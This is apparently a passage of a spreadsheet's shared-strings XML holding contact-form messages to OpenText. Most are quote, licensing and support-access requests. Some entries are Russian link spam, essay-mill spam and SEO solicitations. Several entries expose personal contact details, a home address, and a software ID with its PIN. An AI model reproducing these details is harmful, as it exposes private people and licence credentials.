  </si>
  <si>
    <t>looking for a quote and a demo server</t>
  </si>
  <si>
    <t>Cannot access support with my login anymore.</t>
  </si>
  <si>
    <t>Портал [url=https://zaxvatu.net/]zaxvatu.net[/url] не ставит перед собой целью стать новостным ресурсом, материалы на сайте и в его отдельных категориях публикуется периодически, не заостряя внимания на их новизне, потому ресурс можно охарактеризовать как - периодика. _x000D_
Портал захвату.нет разбит на категории, где размещаются статьи подходящие по смыслу относительно названий самих категорий. _x000D_
Категория «Недвижимость» наполняется новостями и статьями о недвижимости России, США и всего остального мира. Подкатегория «Дом» содержит всё то, что может относиться к этому понятию, интерьеры домов и многое другое. В подкатегории «Бизнес» добавляются статьи и обзоры финансового характера и все, что касается бизнеса и денег. Подразделу «Стройка» отведена роль пополняться материалами, относящимися как-либо к строительству и изменению в этой сфере.</t>
  </si>
  <si>
    <t>The Programme Committee is very interested in the book Ingenious co-authored by Mr. Tom Jenkins for a 45-60 minute Power Point presentation to approximately 60-80 mostly seniors on the 4th Tuesday of the month at 7:30 pm at Bendale Public Library 1515  Danforth Road Scarborough. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We are excited to announce at this point in the registration process both attendees and exhibitors are 15% greater than they were this time last year. We expect this year’s Symposium attendance will exceed all previous years in all aspects. _x000D_
_x000D_
The increase in exhibitors already registered has forced us to add space to accommodate one LAST CALL for Exhibitors! As a final follow up, we are urging those who wish to participate as an exhibitor at the National Children’s Advocacy Center’s 34th International Symposium on Child Abuse to be held March 19 through March 22, 2018 to register as soon as possible. With a record number of attendees from across the U.S. and the world, you can make the most of your marketing dollars by exhibiting and/or advertising to reach key decision makers. The growing number of foreign advocacy centers who will be represented provides a unique opportunity for organizations wishing to expand domestically and abroad._x000D_
_x000D_
If you are debating about whether or not you should exhibit and/or advertise at the 34th International Symposium on Child Abuse, we suggest you visit our Exhibiting and Advertising Guide to see what past exhibitors and advertisers have said.  In addition to the demographics of our attendees, the guide illustrates what they buy, where they are from, their intention to return, and the acceptance and utilization of the Symposium Conference App designed to benefit the attendees, exhibitors, and advertisers. The Exhibitor and Advertising Registration process is open, but it will close on February 19, 2018. So, REGISTER NOW to insure you have an opportunity to exhibit!_x000D_
_x000D_
Can’t make it to the Symposium in person to exhibit or wish to enhance your exhibiting experience? You can advertise in the Symposium Conference App. REGISTER NOW to include your advertisement in the App!_x000D_
Finally, if you have any questions or need assistance to register, please feel free to contact Stacie Dice at 256-327-3838._x000D_
</t>
  </si>
  <si>
    <t>Please could you provide my with the cost for a single Accell/Vision license plus the cost of end user license's.  Thanks in advance_x000D_
_x000D_
Yours_x000D_
_x000D_
PM Lucas</t>
  </si>
  <si>
    <t>We are looking for an document (PDFs) content solution that can support 2M customers who will be viewing and downloading PDF copies of their lease or finance contracts and other related documentation. Please contact me as soon as possible if you have product or services which can support this requirement. Thank you!</t>
  </si>
  <si>
    <t>Your voicemail tells us to go to www.opentext.com/block or blocked. The page is not available. Please block all future calls to 800-840-1095</t>
  </si>
  <si>
    <t>Unable to access support links, products and other posted threads. Used to access product downloads and service requests with EMC account site.</t>
  </si>
  <si>
    <t>We have a number of users who have been using Brava Reader. We would like to implement the concurrent version of Brava Desktop. Please let me what what is necessary to implement the concurrent licensing version. A few questions are_x000D_
1. What type of license manager do you use?_x000D_
2. What OS is the license manager compatible with?_x000D_
3. What are our options for multiple license servers for redundancy?_x000D_
4. How much will it cost to implement this solution?_x000D_
_x000D_
Please contact me soon as we would like to move forward on this fairly quickly._x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi Sales,_x000D_
                        _x000D_
As you may know, SYNNEX Corp. is a North American IT distribution company, supplying hardware and software vendors to reseller customers and not directly to end users.         _x000D_
_x000D_
PLEASE ADVISE IF THERE ARE ADDITIONAL CHARGES/TAXES FOR END USER IN CANADA _x000D_
_x000D_
May I request a quote for the following? Please advise if you offer distribution/reseller discounts._x000D_
_x000D_
Product: OPEN TEXT_x000D_
Qty: 25 licenses with Standard Support_x000D_
_x000D_
I look forward to your reply._x000D_
_x000D_
McKenzie Merritt_x000D_
SYNNEX Corporation_x000D_
Strategic Procurement_x000D_
mckenziem@synnex.com_x000D_
864- 373-7431</t>
  </si>
  <si>
    <t>Привет всем участникам форума! интересный у вас сайт! _x000D_
Зацените, нашёл супер базу кино онлайн в хорошем качестве: [url=http://inspacefilm.ru/]2017 в хорошем качестве лучшие военные фильмы[/url] _x000D_
http://inspacefilm.ru/komediya/ [b] Список 2017 лучшие комедии [/b] _x000D_
[url=http://inspacefilm.ru/luchshaya-fantastika-spisok-filmov/] Лучшая фантастика 2017 смотреть [/url] Лучшая фантастика 2017 смотреть _x000D_
http://inspacefilm.ru/raznoe/5077-zombi-rayon-zombie-hood-2013.html [b] Смотреть Зомби район / Zombie Hood (2013) онлайн бесплатно [/b] _x000D_
[url=http://inspacefilm.ru/newskino/13427-warner-bros-nadeetsya-prevratit-leonardo-dikaprio-v-dzhokera.html] Warner Bros. надеется превратить Леонардо ДиКаприо в Джокера [/url] _x000D_
и Тут: http://inspacefilm.ru/newskino/12935-film-abramsa-pro-zombi-nacistov-poluchil-datu-premery.html</t>
  </si>
  <si>
    <t>Looking to speak to OK sales representative regarding a new LINN entity.</t>
  </si>
  <si>
    <t>i'd like a quote for cisco CCX call recording.</t>
  </si>
  <si>
    <t>I am tring to enter an invoice in EDI and the pass word and user name is not working. I use CROME .Please send me help to be able to enter the invoices for payment.Thank you</t>
  </si>
  <si>
    <t>Need to discuss setting up EDI for a separate company, that spun off from a parent company. Parent company is an OpenText customer and uses TrustedLink. What options are available for the new company?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team, I am trying to execute payment in one of our invoices. I have tried to pay online option, but it gives me an error. Please advise with this request. Thank you </t>
  </si>
  <si>
    <t>I need access to the knowledge base please...</t>
  </si>
  <si>
    <t xml:space="preserve">We were wondering how much the Redact software is per computer._x000D_
</t>
  </si>
  <si>
    <t>need licence key for test installation of the HP Exstream 9.5.0.3 version. I believe I have a version 9 key and cannot get the engine started...failing with rc012 code..I want to stsart with a proiper version key and see if this solves my issue._x000D_
_x000D_
thank you_x000D_
_x000D_
terry</t>
  </si>
  <si>
    <t>We are looking to bring in OCR (or likeness) technology to reduce manual keying of AP invoices.</t>
  </si>
  <si>
    <t xml:space="preserve">Tendo em vista necessidade de contatar representantes da OpenText no Brasil para possível contratação solicito nos enviar, com a possível brevidade,lista de representantes da OpenText autorizados a operar no Brasil. _x000D_
Grato,_x000D_
</t>
  </si>
  <si>
    <t>Bonsoir_x000D_
nous somme une SSII spécialise dans le  software dévelopment _x000D_
nous souhaitant développer une relation de partenariat avec vous afin de vous representer sur notre territoire</t>
  </si>
  <si>
    <t>Looking for costing (licencing and maintenance) information for OpenText Media Management Cloud Edition</t>
  </si>
  <si>
    <t>Hello , we are evaluating CMS platforms and you were one of our recommended vendors by gartner. I was hoping to have a quick chat and following that a Demo with my team</t>
  </si>
  <si>
    <t>Hey there,_x000D_
_x000D_
I hope you're well! I'm writing to ask whether you might be interested in selling the domain hummingbird.com. As I understand it, you renamed your product to OpenText and may no longer need the domain._x000D_
_x000D_
I'm a food entrepreneur in the Brooklyn area starting up a new venture in healthy, sustainable food, and I'm looking for a name for my company. I really love the name, but saw that you own the domain, so I figured I'd check in to see whether you might be open to a potential sale for the right price. I realize that you currently use the domain, so let me know what price would make selling it worth your while, if any._x000D_
_x000D_
Thanks so much in advance for your time. Please let me know your thoughts!_x000D_
_x000D_
All the best,_x000D_
Sam</t>
  </si>
  <si>
    <t>THIS SHALL SERVE AS AUTHORIZATION FOR OUT THIRD PARTY IT COMPANY, ONPOINT IT, TO ACCESS OUR INFORMATION AND UPDATE LICENSES.</t>
  </si>
  <si>
    <t>Purchasing eRoom</t>
  </si>
  <si>
    <t>"Best Place to Work: We spend too much time at work for it not to drive personal meaning."_x000D_
Did you mean "dErive"?_x000D_
When it comes to quality assurance in written words, you want the best. I am a certified copyeditor and university-level editing instructor. You can call on me when your production team needs that final check that ensures the words on screen are as polished as your customers have come to expect. You can reach me at these coordinates and see my CV at https://www.dropbox.com/s/q110rgiek6v3t9w/AMontgomerie%20scieditor%20teaching%20CV.pdf?dl=0.</t>
  </si>
  <si>
    <t>Многие желающие провести интересный отпуск выбирают морские круизы. Такой вид отдыха приобретает популярность. Конечно, морские круизы очень увлекательны, а в чем-то они превосходят другие виды отдыха, подробнее читайте на сайте [url=http://gturs.com]gturs.com[/url]</t>
  </si>
  <si>
    <t>I would like info on setting up some of our other companies with Fax2Mail services.</t>
  </si>
  <si>
    <t>We received 2 requests for certificate updates that appear to have come from your company on behalf of other trading partners. There are some elements of the emails that appear suspicious, so I need to confirm that these are legitimate requests before proceeding.</t>
  </si>
  <si>
    <t>When i try to open a request support it tell that we don't have access to request support</t>
  </si>
  <si>
    <t>Upstream opprotunties using OpenText</t>
  </si>
  <si>
    <t>Cannot set password (new account)</t>
  </si>
  <si>
    <t xml:space="preserve">How to download these software for installation_x000D_
OT Archive - APP Server_x000D_
SETUP_VERSION=10.5.0.60_x000D_
OpenText Archive Server Base Libraries  BASE 10.5.0 (Revision 10.5.0.61)_x000D_
Patches :_x000D_
ASV-1050-022 _x000D_
MONS-1050-006 _x000D_
DPL-1050-017  /_x000D_
</t>
  </si>
  <si>
    <t>Looking for Price Estimate on 10 seats of Desktop Viewer software with one year maintenance.</t>
  </si>
  <si>
    <t>inquiry / price quote on OpenText™ Communications Center Enterprise (CCE).</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
_x000D_
We have been entrusted with responsibility of collecting the itinerary of products/ range of software used/ licensed by our client- Primary Healthcare._x000D_
_x000D_
Our client (Primary Healthcare) is looking to upload the complete range of software/ products (Jetbrains) to PyraCloud with conclusive information such as date of purchase/ license duration etc. It's for this purpose that we need authentic information to integrate their Software asset Management prudently._x000D_
_x000D_
I had already sent multiple reminders/filled online forms for this that please contact me so that I can share Letter Of Delegation from the customer with you. Please contact me at the above mentioned email address asap._x000D_
_x000D_
Thanks_x000D_
_x000D_
Kapil </t>
  </si>
  <si>
    <t xml:space="preserve">	_x000D_
_x000D_
Bonjour,_x000D_
_x000D_
Après une étude de vos campagne Adwords , nous constatons qu’il y a des mots clés très intéressants sur lesquels vous n’êtes pas positionnés sur Google._x000D_
_x000D_
Nous sommes sous-traitants pour les agences web européennes et canadiennes, par conséquent nous connaissons les meilleures méthodes d’optimisation d’Adwords._x000D_
_x000D_
Dans votre cas la gestion, « des options de correspondance des mots clés » et « Les mots clés négatifs » ne sont pas optimisés à 100%, ce qui engendre un coût d’acquisition bien plus élevé._x000D_
_x000D_
Dans les années 2005- ^_x000D_
 2013, Adwords était plus simple à gérer car il y a avait moins de concurrents, donc des campagnes rentables plus facilement. Maintenant  Adwords est un outil plus puissant qui exige une parfaite maîtrise et  une gestion quotidienne pour le réglage des paramètres._x000D_
_x000D_
Notre agence est spécialisée dans le référencement Adwords ultra concurrentiel._x000D_
_x000D_
Dans 95% des cas, nos clients réduisent de 30% les coûts adwords_x000D_
_x000D_
Nous proposons des frais de gestion 2 à 3 fois moins cher que les agences françaises et sans frais de set-up. _x000D_
_x000D_
N’hésitez pas à nous contacter, nous saurons vous satisfaire._x000D_
_x000D_
_x000D_
_x000D_
		Bien cordialement,_x000D_
		Caroline RAFIDISON_x000D_
		Marketing Wholesaler Website_x000D_
		ID SKYPE: W2CONTACT_x000D_
		Paris, France / Téléphone: +331 78 90 06 06_x000D_
		Antananarivo, MADAGASCAR / Téléphone: +261 3402 54437_x000D_
		www.wholesaler-website.com_x000D_
		Lot IPA 14 bis Ambohidahy Itaosy_x000D_
		caroline@wholesaler-website.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Всем привет! интересный у вас сайт! _x000D_
Нашел интересную базу кино:  [b] Список 2017 лучшая фантастика [/b] [url=http://kinokub.net/]http://kinokub.net/[/url] _x000D_
Здесь: http://kinokub.net/news/8318-kolovrat-voshozhdenie-premera-tizera.html [b] «Коловрат. Восхождение»: Премьера тизера [/b] _x000D_
Тут: http://kinokub.net/priklyucheniya/5572-greviti-folls-graviti-folz-gravity-falls-sezon-1-2-2012-2014.html _x000D_
http://kinokub.net/luchshaya-fantastika-spisok-smotret-onlayn/ [b] Лучшая фантастика бесплатно [/b] _x000D_
[url=http://kinokub.net/melodrama/] Лучшие мелодрамы новинки смотреть онлайн [/url] _x000D_
[url=http://kinokub.net/luchshaya-fantastika-spisok-smotret-onlayn/] Лучшие фантастика 2017 в хорошем качестве [/url] Лучшие фантастика 2017 в хорошем качестве</t>
  </si>
  <si>
    <t>Discuss commercial version of Birt</t>
  </si>
  <si>
    <t>Wund-Pflege-Experte 15-17 März 2018</t>
  </si>
  <si>
    <t>We are exploring OpenText India's capabilities in support large global implementation of Teamsite and B2C solutions</t>
  </si>
  <si>
    <t>Unable to get to MySupport, constantly notified I need to register my email. Already registered multiple times and mail indicates everything is OK.</t>
  </si>
  <si>
    <t>From Hyderabad, India.Need to know the quotation for storing our valuable documents online for due diligence for immediate requirement.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I need My Support access and can't make it happen._x000D_
_x000D_
Could you please activate this for me? _x000D_
_x000D_
Thanks,_x000D_
Raiko</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
  We are currently running on Data Integrator V4.4.1 and would like to download the latest version. Could you provide me with the necessary links to download the software and install on our z/OS 2.2 Thanks.</t>
  </si>
  <si>
    <t>I purchased 10,000 shares of Metastorm stock in July or August of 2001. Please would you let me know what has happened to these shares after purchase by OpenText. _x000D_
_x000D_
My mailing address was, and still is:_x000D_
92 Kingsley Road _x000D_
Farnborough _x000D_
GU14 8SY _x000D_
UK</t>
  </si>
  <si>
    <t xml:space="preserve">I've just purchased Brava! Desktop CXL 16.3 and I'm trying to retrieve my product key from the 'Support' area of OT. Unfortunately I'm being denied access to the support area._x000D_
_x000D_
Could you rectify this situation quickly please?_x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
James_x000D_
_x000D_
NB: Product Description: Brava! Desktop CXL_x000D_
Product Version: 16.3_x000D_
_x000D_
Software ID: 8867A12232BF436E90E6311BDF9EDBE8_x000D_
Software PIN: IGC460082_x000D_
</t>
  </si>
  <si>
    <t>Внешний облик Вашего дома, дачи или коттеджа буквально преобразится, если вы выберете качественные панели для отделки. Любое жилое пространство приобретет по-настоящему благородный и дорогой вид, если Вы вложите немного времени и денежных средств на данные манипуляции, подробнее об этом читайте на сайте [url=http://montazhnik02.ru]montazhnik02.ru[/url]</t>
  </si>
  <si>
    <t>We are looking for a to a Cloud Content(PDF) Management Software(SaaS) with access control. Do you have any solution related to it?</t>
  </si>
  <si>
    <t>Need HIPAA compliant faxing solution. Thanks</t>
  </si>
  <si>
    <t>need help for ihub report server</t>
  </si>
  <si>
    <t>We are using HP Exstream and review a review the StreamServe Exstream features</t>
  </si>
  <si>
    <t xml:space="preserve">I have a prospect, Carson City, NV who has asked us to integrate our software with their Documentum solution.   How can I get access to the API? Can I get documentation on using the API?  I need to price an integration and it would be helpful to have some documentation._x000D_
</t>
  </si>
  <si>
    <t>We imagine that only a able writer can ship visionary fulfilled that’s nothing short of fulfilled http://ouanessayounsi.com/best-college-essays/moleskines-wise-composing-arranged-changes-pencil-as-well-as-document-information-in-to-electronic-documents/ and brings the paramount results. Gel filtration chromatography research paper. Every online composition wordsmith in our network has a concentrated track-record of providing into and expos‚ aid to students. The myth of sisyphus and other essays citation</t>
  </si>
  <si>
    <t xml:space="preserve">Looking at Vendor Invoice Management demo to automate our AP invoice process. Look at the implementation time and associated cost.  </t>
  </si>
  <si>
    <t>An event that might be of interest to some of your Government people: https://www.meetup.com/Information-Innovation-UTS/events/247101924</t>
  </si>
  <si>
    <t xml:space="preserve">Please  return a copy of your  W-9 to my attention by email:  SNORD@ARDLOGISTICS.COM_x000D_
_x000D_
Internal Revenue Service regulations require us to furnish informational returns (1099 MISC) to every person or entity, other than a corporation, to whom we paid $600.00 or more by the end of the year. Our current records indicate we have no taxpayer identification number (TIN) on file for you or your company._x000D_
_x000D_
For individuals, the TIN is the social security number. For most non-individuals (trust, estates, partnerships &amp; similar entities), the taxpayer identification number is the employer identification number (EIN). We will not have to file a form 1099 for you if you are a corporation, tax exempt organization, exempt payee, or if you receive less than $ 600.00 from us by year’s end. _x000D_
   _x000D_
The information will not be used for any other purpose than to comply with federal regulations._x000D_
_x000D_
Thank you in advance for your cooperation in this matter._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking to replace IBM Content Manager Product</t>
  </si>
  <si>
    <t>Hi. I couldn’t find how it could be possible to use your semantic text analyzer. Is it a paid service? How much does it cost? How can it be used? Integrated with an api?</t>
  </si>
  <si>
    <t xml:space="preserve">OpenText™ Content Server 16.2.3 is now available email; please provide the purchase order assigned to this upgrade announcement.   Thanks! </t>
  </si>
  <si>
    <t>Can you help me to Quote 5 licences of brava reader just for open tiff an pdf formats _x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Would like to know how to find our Elite Program points balance.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to get pricing for the item below:_x000D_
OpenText RightFax 10.6 -unlimited users -hardware purchase, OpenText Right Fax Server Hardbox ( Dell Power Edge E03S, Dialogic Analog Card TR1034+E8-8L-R, Dialogic Analog Card TR1034+ELP4-4L, Dialogic digital T1 Card -hardware install_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I submitted a request from Dr. Alan Kronhaus, Doctors Making Housecalls, about 3 hours ago and haven't heard from anyone.  Their devices are not functioning properly and we are in need of some assistance.  If someone could contact him to get their support contract renewed it would be greatly appreciated.  </t>
  </si>
  <si>
    <t>Interest on OpenText Imaging Enterprise Scan</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We currently use RightFax for our company and we would like to move the database from SQL2012 to SQL 2016 instance. _x000D_
_x000D_
Does the product supports running on SQL 2016?_x000D_
If so, do you have any documentation on what configuration changes need to be made to the RightFax application?_x000D_
_x000D_
Thank you for any help you can provide.</t>
  </si>
  <si>
    <t xml:space="preserve">A Transnordestina Logística está em busca de um novo parceiro no âmbito de gestão eletrônica de documentos (GED/ECM), a fim de integrar processos de diversos setores da companhia._x000D_
_x000D_
A demanda é bastante sensível e com isto buscamos conhecer fornecedores que possam se tornar parceiros. Com isto, solicito que encaminhe seu portfólio de apresentação com foco em GED/ECM para que possamos apreciar as funcionalidades da sua solução._x000D_
</t>
  </si>
  <si>
    <t>Our client, a large government institution would like to review a BI system. Can you show us a demo? email some more information?</t>
  </si>
  <si>
    <t>Good day, i have write several letter on request for more details about fax service i will be glad to hear from you as soon as possible._x000D_
_x000D_
Warm greeting,_x000D_
_x000D_
Audrey Rotell_x000D_
Pennsylvania Wine &amp; Spirits Association_x000D_
2000 Hamilton St., PMB #518_x000D_
Philadelphia, PA 19130_x000D_
Phone: 484-509-9296_x000D_
Fax: 888-451-1869_x000D_
www.pawineandspiritsassn.com</t>
  </si>
  <si>
    <t>Hi. There is no link to your interactive benefits tool indicated on page https://www.opentext.com/campaigns/agaforsharepoint/ecmmicrosoftbenefits_x000D_
_x000D_
Please can you correct your page and send me the link? Thanks</t>
  </si>
  <si>
    <t>Need to review agreements for DDK and Boston Traders Inc. and change billing.</t>
  </si>
  <si>
    <t>Hemos instalado la versión trial de powerdocs desde el appexchange y tenemos problemas al configurarlo. Estaríamos agradecidos si nos enviaseis documentación para el usuario._x000D_
Saludos</t>
  </si>
  <si>
    <t>I can not enter my support, neither can I download Brava! Desktop CXL 16.3.  Please give me the necessary instructions to solve this.</t>
  </si>
  <si>
    <t>We currently use “Open Text Exceed 14 x64” and “Open Text Secure Shell 14 x64”_x000D_
_x000D_
We don’t use citrix anymore._x000D_
_x000D_
Our license is until mid 2018._x000D_
_x000D_
I wanted to know if we can renew our license for this version and keep using it, or do we must move to the new web version._x000D_
_x000D_
Thanks._x000D_
Hananya Atari</t>
  </si>
  <si>
    <t xml:space="preserve">contract renewal options &amp; pricing. Need tech support asap. </t>
  </si>
  <si>
    <t>I would like to obtain the API documentation for LSCS v7.4.1 which is currently utilized at Cigna.  I am trying to determine if our version of the product supports a responsive design (Asynchronous calls).</t>
  </si>
  <si>
    <t>Are your licenses for Brava Desktop charged per user or per computer?</t>
  </si>
  <si>
    <t xml:space="preserve">Good Evening_x000D_
_x000D_
I have a login and a password the same of my email address but it's impossible for me to be recognized by your site._x000D_
It seems that i am administrator group but i canno access to this window to modify the rigths._x000D_
Incredible !!!_x000D_
_x000D_
Many Thanks for your Help !_x000D_
Best regards _x000D_
Marc Hombourger_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I've tried to unsubscribe your newsletter 5-6 times now during the last couple of months but still I get mail from "direct@opentext.com", the last came today.  Could You please check your unsubscribe-functionality,  stop sending any kind of emails to me and also remove all my email addresses and profiles from your system ? Thank You!</t>
  </si>
  <si>
    <t>We now offer front line support for edocs DM and are wondering which courses would best fit our needs in order to be able to respond to help support. We currently use edocs DM 5.3.1.</t>
  </si>
  <si>
    <t>INTERESTED IN TAKING THE DOCUMENTUM CAPITAL PROJECTS ADMINISTRATION WEB BASED COURSE NEED MORE INFORMATION</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for product options that can support 10,000+ annual file load with long term retention and versioning that offers full API interactions with e-signature ability </t>
  </si>
  <si>
    <t>Availing Opentext archiving Servers 10.5</t>
  </si>
  <si>
    <t>Приветствую! Класный у вас сайт _x000D_
Нашел прикольные сервера cs на этом сайте: http://serveracss.net/ : _x000D_
[url=http://serveracss.net/game/cs] сервера кс 1 6 с картой 2000 [/url] _x000D_
[b] сервера ксс в 34 кс го оружия [/b] http://serveracss.net/game/csgo _x000D_
[b] сервера css v88 deathmatch [/b] http://serveracss.net/game/source _x000D_
И тут нашёл много интересных новостей про игры и сервера: _x000D_
http://serveracss.net/server_info/46.174.49.44:27296/</t>
  </si>
  <si>
    <t>As part of GML, Kaizen Digital Services is a company operating in the gambling industry, currently in 3 countries (Greece, Cyprus and Romania) and planning to expand to 3 more markets within 2018._x000D_
_x000D_
Due to certain regulatory compliance needs as well as our housekeeping activities we would like to incorporate a solution in order to map the company’s Data. Currently we are utilizing Google Drive as a File System Solution through the Google Suite. However, we are unable to track the workflow of the documents, identify the ownership and enforce versioning and protocolling in a clear and concise manner. We would require the proposed solution to enable the organization to organize and map all company’s Data and improve the controls in place with regards to Data Ownership and Tracking._x000D_
_x000D_
Additionally, the proposed solution should incorporate an approval process with regards to ownership of data. The process should be customizable and fully adjustable to the organizations hierarchical needs, focusing and enforcing the appropriate approval flows along the chain of command based on the Data’s nature and as the regulations and the organization’s needs require._x000D_
_x000D_
An important part of the solution is the requirement with regards to the ability to monitor and control the versioning of the files in order to track changes and historic data where needed. Additionally, a method of protocolling (i.e. e-Protocol) should be incorporated in order to be able to verify and prove the file versions stored, as well as communicated to regulators, 3rd parties etc._x000D_
_x000D_
Finally, as the GDPR compliance of the organization is a fundamental requirement for our business we would require the proposed action to be GDPR compliant and able to adjust to future regulations that may be applied._x000D_
_x000D_
We will be happy to arrange a meeting to present us the tool you provide and get an insight on how we will manage to cover our digital needs regarding the the management of records throughout the records-life cy</t>
  </si>
  <si>
    <t>I am relatively new to Casenet and would like to understand who are relationship manager is at OpenText for the RightFax product.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Good day. TFG has got production license with Opentext process suite. I would like to get access to the process suite downloads site </t>
  </si>
  <si>
    <t xml:space="preserve">I need to use the support portail, but my Society isn't register on your site._x000D_
I try to renewal my support services, but I don't have answer to my ask._x000D_
_x000D_
This is my credential informations :_x000D_
Numéro de contrat : 932042D_x000D_
Instance ID 23742251_x000D_
Instance ID 23742252_x000D_
Client : CIT / CITOXLAB (CIT SAS)_x000D_
</t>
  </si>
  <si>
    <t>I want to get prices for the first class server software and to get a demo to evaluate the software please and thank you</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je suis Karim de OneTech Business Solutions, intégrateur IT en Tunisie. _x000D_
Pourriez vous m'orienter vers la personne qui s'occupe de la Tunisie pour les solutions Right Fax?_x000D_
Merci._x000D_
Cordialement,</t>
  </si>
  <si>
    <t>We need the service to recognize the handwritten text from images.please confirm if you are having such service</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam, _x000D_
May I kindly ask you to confirm that Ms Alessandra Marchi (formerly: Alessandra Lewis) obtained the "ENCE - EnCase Certified Examiner" certification from Guidance Software (licence number 15 0114 6187) and that she is still an active member? We need this information in the context with an Compliance Check. I can provide you with the Social Security number and a Consent Form of the candidate, if necessary. _x000D_
Thank you and best regards, _x000D_
Uta Schroeter </t>
  </si>
  <si>
    <t>Dear Madam, Dear Sir,_x000D_
_x000D_
According to your website, there's only 1 reseller and 1 services in Belgium._x000D_
Do you have any other partners in Belgium (or France) who are able to implement and provide support with Opentext and Capital Projects?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Dear Entrepreneur,_x000D_
_x000D_
Hope everything is going well at your end!_x000D_
_x000D_
Allow us to analyze and figure out the major factors that contribute to Low Search Engine Results and take vital steps to bring more organic customers and sales._x000D_
_x000D_
We Help You in Analyzing:-_x000D_
_x000D_
1.	How a customer will find your website?_x000D_
2.	Why your competitors are more successful than you?_x000D_
3.	How to increase your business online?_x000D_
4.	What should be appropriate keywords?_x000D_
5.	Is your website latest version updated?_x000D_
_x000D_
After your confirmation, I would be glad to provide you with further detailed Proposal of your website and then fix a time to talk with you on the phone and Skype._x000D_
_x000D_
I would appreciate it if you can reply as soon as possible._x000D_
_x000D_
_x000D_
------_x000D_
Thanks &amp; Regards_x000D_
Anil Ray_x000D_
Business Development Manager_x000D_
Email: anil.webexpert@hotmail.com_x000D_
NKP349/04</t>
  </si>
  <si>
    <t>We have a client (an insurance firm) that wants a document management system. I want a probing sheet for your solution and also the pricing. Thank you.</t>
  </si>
  <si>
    <t>Hi,_x000D_
We face a problem opening admin console as the password was lost._x000D_
We recently paid license and support with you directly as the local partner doesn't respond to our communications._x000D_
This is urgent._x000D_
Please contact ASAP._x000D_
Company name MSCC.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I’ve sent you a couple of messages about guest posting and I haven’t heard from you.  I'm sure your time is precious plus the site is awesome, I can see it must keep you incredibly busy._x000D_
_x000D_
If things change and you are interested in a guest post in the future, do let me know. I’d love to get something together for you._x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Cassie_x000D_
_x000D_
_x000D_
Cassie Phillips_x000D_
Marketing Associate_x000D_
DIGITAL EXITS, LLC_x000D_
w:	www.digitalexits.com  e: cassie@digitalexits.com_x000D_
 </t>
  </si>
  <si>
    <t>We have recently worked on a number of Fiori Apps for customers not satisfied by standard VIM apps and I wanted to enquire about any potential partnership programme where your customers can use our SAPUI5 applications as part of your standard offering.</t>
  </si>
  <si>
    <t>Exploring the expansion of BPO services</t>
  </si>
  <si>
    <t>Hi, one of our businesses at Poca is as a contractor for Indonesia military and law enforcement agencies. can I learn more about your solutions and promote them to my custpmers? feel free to email me at deni@pocagroup.com or call/whatsapp my number, thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We require 50 licenses for Brava! Reader TX, is it possible to get a quote for this many please?_x000D_
_x000D_
Kind Regards,_x000D_
Andrew Langman</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
wir sind auf der Suche nach einer SAP Erweiterung zur Automatisierung unserer Eingangsrechnungen auf Ihr Unternehmen gestoßen. Können Sie uns Angebote machen für ein Belegvolumen von 10.000, 15.000 und 20.000?_x000D_
_x000D_
Bei Fragen können Sie mich gerne kontaktieren._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Melanie Reinert  _x000D_
Online Marketing Manager, Marketing_x000D_
Fixemer Logistics GmbH _x000D_
_x000D_
T:  +49 6867 50 129_x000D_
E:  MReinert@fixemer.com</t>
  </si>
  <si>
    <t>Team, i would like to propose an open text archiving solution to one of our customers "OpenText™ Data Archiving for SAP® Solutions",  i need some additional inputs before i commit to my customer interms of the solution, pricing etc... can i reach out to a relevant personnel from Open Text... would prefer a Webex invite... preferably today..._x000D_
Regards,_x000D_
Srikanth k.</t>
  </si>
  <si>
    <t>Data Mining 2018 cordially invites all participants across the globe to attend the 5th International Conference on Big Data Analysis and Data Mining (Data Mining 2018) which is going to be held during June 20-21 in Rome, Italy to share the Future Technologies for Knowledge Discoveries in Data" and technology._x000D_
_x000D_
Data Mining 2018 brings together leading scientists, engineers, directors of companies in the field of ‘Big Data’ to exchange information on their latest research progress. The main theme of the conference is “Future Technologies for Knowledge Discoveries in Data" which covers a wide range of critically important sessions. _x000D_
Speaker and Delegate slots are available_x000D_
_x000D_
For more details: https://datamining.conferenceseries.com/</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
Greetings!_x000D_
_x000D_
We belong to Sony Software Services team and enable IT to serve our business worldwide from our Bangalore office._x000D_
_x000D_
For one of our business region, we are using OpenText TeamSite product and considering to expand its footprint globally._x000D_
We would like to know how OpenText team can collaborate with us and support in this journey._x000D_
_x000D_
Look forward to discuss with you about it soon.Thanks._x000D_
_x000D_
Regards,_x000D_
Prashant Tiwari_x000D_
M +91 7259623103  | Sony India Software Centre Private Limited, Bengaluru _x000D_
Email: prashant.tiwari@sony.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please email trial installation link for opentext content viewer toolkit </t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like to enquire about OpenText/Documentum  capanbilities and solutions in delivery a document management system for APAC,  mainly around personnel filing at this stage._x000D_
Thanks_x000D_
_x000D_
Scott</t>
  </si>
  <si>
